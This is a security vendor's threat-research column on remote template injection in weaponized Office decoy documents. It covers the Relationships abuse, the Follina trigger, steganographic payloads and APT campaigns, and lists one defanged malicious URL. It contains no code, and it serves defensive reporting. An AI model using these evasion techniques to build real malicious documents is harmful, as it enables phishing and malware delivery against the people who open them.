Weaponized files – files that have been altered with the intent of infecting a device – are one of the leading pieces of ammunition in the arsenals of digital adversaries.
They are used in a variety of ways. Security professionals previously found threat actors leveraging the App Engine Google Cloud computing platform (GCP) to deliver malware via PDF decoys, while further research unveiled the use of image files like png and jpeg to compromise Android devices.
Albeit striking examples, these are ultimately two drops in a much larger ocean. From PDFs to image files to Microsoft Office documents, threat actors are using a variety of files containing code, links and even videos to deploy malware, ransomware, Trojans and remote access software to achieve their objectives. To make matters worse, it is becoming increasingly difficult to determine what is a threat and what is not.
Attackers are becoming increasingly intelligent in how and where they route their attacks, be it web downloads, shared drives, or even attaching files to be intercepted and/or legitimate-looking text message feeds and email threads.
In this latest column, we’ll be looking at template injection techniques that leverage weaponized decoy documents specifically, not least because the Menlo Labs Team has recently witnessed a spike in such attacks.
What are Template Injection Techniques?
Template injection techniques are nothing new. What is new is the use of template injection in Highly Evasive Adaptable Threat (HEAT) attacks.
In 2007, Microsoft introduced new file formats for Word, Excel and PowerPoint based on the Office Open XML File Format specification, providing the ability to embed resources within a document.
Unfortunately, in leveraging a method that this change introduced called Relationships (used to form a connection between a source and target resource in an XML file), adversaries have been able to pursue living-off-the-land (LotL) attacks by injecting a URL hosting the malicious template into an XML file.
What makes template injection a particularly attractive technique to attackers is that no suspicious indicators like macros need to be present in the document until the malicious template is fetched.
This means that weaponized template injection documents can look benign at face value, lacking any trace of malicious URLs or exploit markers. As a result, they are highly likely to go undetected by many security detection technologies, making them perfect for deployment via email attachments.
Why is this a problem? At many firms that use email scanning technologies as a first line of defense, employees may be under the impression that only safe emails can reach their inboxes. With weaponized injection templates slipping through the net, they may be lured into a false sense of security.
At Menlo Security, we’ve even seen adversaries successfully hijacking existing email thread conversations to convince victims of the legitimacy of attached weaponized template injection documents.
Template Injection Attacks in Action
The Menlo Labs team has witnessed various template injection attacks of late, a prime example being the use of masqueraded Microsoft URLs to trick victims into downloading a malicious template.
In these instances, we’ve seen documents download a malicious dotm template from a specialized URL that then downloads malware onto a victim endpoint, using image steganography to hide the payload in an image taken by the James Webb Telescope.
The “Follina” Zero Vulnerability (CVE-2022-30190) is a second example. A vulnerability existing in Microsoft Support Diagnostic Tool (MSDT), threat actors have been able to host the exploit in an external public-facing URL that was then injected into a document with an exploit marker “!” at the end of the URL for triggering the template. In one of the attacks we witnessed, the document claimed to be a “VIP Invitation to Doha Expo 2023.”
Thirdly, the Menlo Labs team also saw the infamous advanced persistent threat (APT) group Patchwork leveraging template injection attacks. Using a weaponized document downloaded by potential victims from the URL: “http://office-fonts[.]herokuapp[.]com/en-us,” claiming to be from the “Ministry of Defense, Pakistan,” any victim would be faced with the download of a password-protected PDF file, “Scan03.pdf.”
Notably, the URL used in the attack was hosted in a domain cloud platform, “Heroku.” Using either benign or reputable for delivering malware in this way is a known HEAT technique called Legacy URL Reputation Evasion (LURE) or Living Off Trusted Sites (LOTS).
Mitigating Advanced Threats
In recent months, we’ve seen plenty of additional examples of targeted attacks using weaponized template injection documents.
In August 2022, Morphisec posted details about the DoNot team’s latest spear phishing email campaign, which used RTF template injection documents to attack targeted government departments such as Pakistan’s defense sector.
Further, PwC and Proofpoint posted details on attacks carried out by the TA453 group in both July 2022 and September 2022, these efforts having leveraged Microsoft Word document droppers that use remote template injection to obtain and execute a malicious macro.
Meanwhile, in a recent post from September 2022, Cisco posted details on Gamaredon APT targeting Ukrainian government agencies with phishing emails to deliver Microsoft Office documents containing remote templates with malicious macros.
Based on the nature of these attacks, we assess with high confidence that template injection attacks will continue to increase and even be used to load exploits on the fly.
To mitigate the threat of template injection attacks, we recommend organizations consider adopting isolation technology. Used to ensure that all documents are opened in a cloud container away from the user’s endpoint, it is a solution that converts any files into safe and viewable versions until any active or malicious content is stripped out and removed.
In facing advanced threats such as template injection attacks, legacy tools no longer offer adequate protection. Organizations need modernized defenses.